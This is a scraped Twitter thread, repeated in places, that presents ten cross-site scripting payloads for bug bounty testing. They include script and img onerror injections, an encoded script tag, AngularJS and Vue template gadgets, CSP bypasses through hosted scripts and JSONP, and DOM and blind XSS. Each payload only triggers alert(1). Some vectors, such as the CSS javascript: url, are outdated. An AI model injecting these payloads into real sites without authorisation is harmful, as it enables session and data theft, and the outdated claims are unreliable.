Read on Twitter
Do you love XSS as much as I do? 🐞
Sharing 10 common XSS payloads and how to use them for bug bounty hunting💰
Ready to level up your XSS skills? Let’s go! 🧵👇
Sharing 10 common XSS payloads and how to use them for bug bounty hunting💰
Ready to level up your XSS skills? Let’s go! 🧵👇
XSS is one of the most common web bugs. It allows an attacker to inject malicious code into a web page that can execute in the browser of a victim.
Here are common XSS payloads that you can use to test for XSS vulnerabilities and earn some bounties💰
Let’s get started! 👇
Here are common XSS payloads that you can use to test for XSS vulnerabilities and earn some bounties💰
Let’s get started! 👇
The simplest XSS payload is just a script tag with an alert function. This will pop up a message box on the victim’s browser.
<script>alert(1)</script>
You can also use other functions like confirm, prompt, or console.log.
<script>alert(1)</script>
You can also use other functions like confirm, prompt, or console.log.
Sometimes, the script tag is filtered or escaped by the web app. In that case, you can try to use other HTML tags that can execute JavaScript, such as img, svg, div, etc.
For eg, this payload will trigger an alert when the image fails to load:
<img src=x onerror=alert(1)>
For eg, this payload will trigger an alert when the image fails to load:
<img src=x onerror=alert(1)>
Another way to bypass script tag filtering is to use different encodings, such as hexadecimal, decimal, or base64. You can use online tools like to encode your payload.url-encode-decode.com
For example, this payload is equivalent to <script>alert(1)</script> but encoded in hexadecimal:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
Sometimes, the web app uses a whitelist of allowed HTML tags or attributes. In that case, you can try to find a way to break out of the context and inject your payload 👇🏾
For eg, if the web app allows <a> tags with href attributes, you can try this payload:
<a href="javascript:alert(1)">Click me</a>
<a href="javascript:alert(1)">Click me</a>
For eg, if the web application allows `<a>` tags with `href` attributes, you can try this payload:
`<a href="javascript:alert(1)">Click me</a>`
This will execute the JavaScript code when the user clicks on the link.
`<a href="javascript:alert(1)">Click me</a>`
This will execute the JavaScript code when the user clicks on the link.
Another common XSS vector is through CSS.
You can inject CSS code that can execute JavaScript using the expression or url properties.
For example, this payload will trigger an alert when the CSS is applied:
<style>*{background:url(javascript:alert(1))}</style>
You can inject CSS code that can execute JavaScript using the expression or url properties.
For example, this payload will trigger an alert when the CSS is applied:
<style>*{background:url(javascript:alert(1))}</style>
Sometimes, the web application uses a template engine or a framework that has its own syntax for rendering dynamic content. You can try to exploit these syntaxes to inject your payload 👇🏾
For example, if the web app uses AngularJS, you can try this payload:
`{{constructor.constructor('alert(1)')()}}`
This will execute the JavaScript code using the constructor property of the AngularJS scope object.
`{{constructor.constructor('alert(1)')()}}`
This will execute the JavaScript code using the constructor property of the AngularJS scope object.
Another way to exploit template engines or frameworks is to use their built-in filters or directives that can execute JavaScript.
For example, if the web application uses Vue.js, you can try this payload:
<div v-html="$options.constructor.constructor('alert(1)')()">
For example, if the web application uses Vue.js, you can try this payload:
<div v-html="$options.constructor.constructor('alert(1)')()">
The above will execute the JavaScript code using the constructor property of the Vue.js options object.
Sometimes, the web app uses a Content Security Policy (CSP) that restricts the sources of scripts that can be executed. In that case, you can try to find a way to bypass the CSP and inject your payload.
For example, if the web application allows scripts from , you can try to host your payload on that domain and load it using a script tag:
<script src=https://t.co/QoIPrf6aJo></script>example.com
example.com/xss.js
<script src=https://t.co/QoIPrf6aJo></script>example.com
example.com/xss.js
Another way to bypass CSP is to use a trick called JSONP hijacking. JSONP is a method of loading JSON data from a different domain using a script tag. If the web app uses JSONP and does not validate the callback parameter you can inject your payload as the callback function name.
For example, if the web application loads JSON data from , you can try this payload:
<script src=https://t.co/6SIho9DOK2></script>
This will execute the alert function with the JSON data as the argument.example.com/data.json?call…
example.com/data.json?call…
<script src=https://t.co/6SIho9DOK2></script>
This will execute the alert function with the JSON data as the argument.example.com/data.json?call…
example.com/data.json?call…
Finally, you can also use advanced techniques such as DOM-based XSS or blind XSS to exploit XSS vulnerabilities that are not reflected in the response or are triggered in a different context.
DOM-based XSS occurs when the JavaScript code on the web page uses user input to manipulate the DOM without proper sanitization. For example, this code is vulnerable to DOM-based XSS:
`document.write(location.hash)`
`document.write(location.hash)`
You can exploit ☝🏾 by appending your payload as the hash value in the URL:
`<script>alert(1)</script>`example.com/#
`<script>alert(1)</script>`example.com/#
Blind XSS occurs when the user input is stored on the server and later rendered on a different web page that is viewed by another user, such as an admin or a moderator.
For eg, this code is vulnerable to blind XSS:
You can exploit it by submitting your payload as the comment:
`<script>alert(1)</script>`
You can use tools like to generate a blind XSS payload that will notify you when it is executed.xsshunter.com
You can exploit it by submitting your payload as the comment:
`<script>alert(1)</script>`
You can use tools like to generate a blind XSS payload that will notify you when it is executed.xsshunter.com
That's it for this thread. I hope you learned something new and useful about XSS.
If you did, please like and retweet to spread the word. 🙏
Happy hunting! 🐞
If you did, please like and retweet to spread the word. 🙏
Happy hunting! 🐞
• • •
Missing some Tweet in this thread? You can try to
force a refresh
